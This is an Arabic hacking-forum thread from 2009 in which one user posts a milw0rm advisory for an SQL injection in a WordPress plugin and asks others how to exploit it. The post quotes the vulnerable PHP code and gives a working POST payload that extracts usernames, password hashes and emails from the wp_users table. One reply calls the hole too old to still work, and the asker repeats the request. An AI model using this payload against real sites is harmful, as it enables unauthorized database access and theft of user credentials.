التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة يا شباب مين بدهـ يساعدني يجزيه الخير..
التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-10-2009, 10:59 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية genious
 

 
 
إحصائية العضو





genious غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
genious is on a distinguished road
افتراضي غير مجاب: يا شباب مين بدهـ يساعدني يجزيه الخير..

كيف يمكن استغلال هذه التغرة



كود:
http://wordpress.org/extend/plugins/related-sites/
/wp-*******/plugins/related-sites/BTE_RW_webajax.php

eLwaux(c) 30.05.2009, uasc.org.ua


SQL-Inj

27:  $guid = $_POST['guid'];
28:  $click = $_POST['click'];
31:  $ref = $_SERVER["HTTP_REFERER"];
40:  if ($guid!="" && $click!="" && $hostname!="" && $ipaddr!="" && $ref!="") {
53:   $sql = "INSERT INTO $clicks_table_name (guid,click) VALUES ('$guid','$clickinfo')";
55:  }

exploit:
POST: guid = 0', (select concat_ws(0x3a,user_login,user_pass,user_nicename,user_email) from wp_users where ID>0 and user_status=0 limit 1 ) );-- 
POST: click = .
HTTP_REFERER = .

# milw0rm.com [2009-06-30]


Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC dh afhf ldk f]iJ dshu]kd d[.di hgodv>>

   

رد مع اقتباس
قديم 07-10-2009, 11:03 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية PASSEWORD
 

 
 
إحصائية العضو








PASSEWORD غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
PASSEWORD is on a distinguished road
افتراضي

الثغرة قديمة
عندها عشرة ايام منذ نزولها لا اتصور انها مازالت تنفع الان

التوقيع

*********************
حكمة : كل انسان يستطيع ان يكون الاول اذا اراد ذلك

 

   

رد مع اقتباس
قديم 07-10-2009, 11:07 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية genious
 

 
 
إحصائية العضو





genious غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
genious is on a distinguished road
افتراضي

كيف يمكن استغلالها

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
dork = للبحث عن ثغرات sql تابع للدوره إلى بدهـ مواقع يتفضل هنا Mr.rAiMoNr SQL قواعد البيانات 22 03-26-2015 01:20 PM
شباب بليز شلون اسوي اميل roger.com@ بسرعة شباب محتاجة شرح تعليم او رابط ThE_GhO$T جـــ'ابات العناكــ'ب 2 11-11-2010 02:51 AM
[BBcode] : كم تبقى على رمضان شهر الخير ومسابقة رمضان شهر الخير xman2 قســم تطويــر المــــواقع 0 08-12-2009 10:51 PM
مشكلة كبيرة يا شباب مين بدهـ يساعدني يجزيه الخير.. V!P جـــ'ابات العناكــ'ب 5 07-08-2009 01:01 PM


الساعة الآن 10:45 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0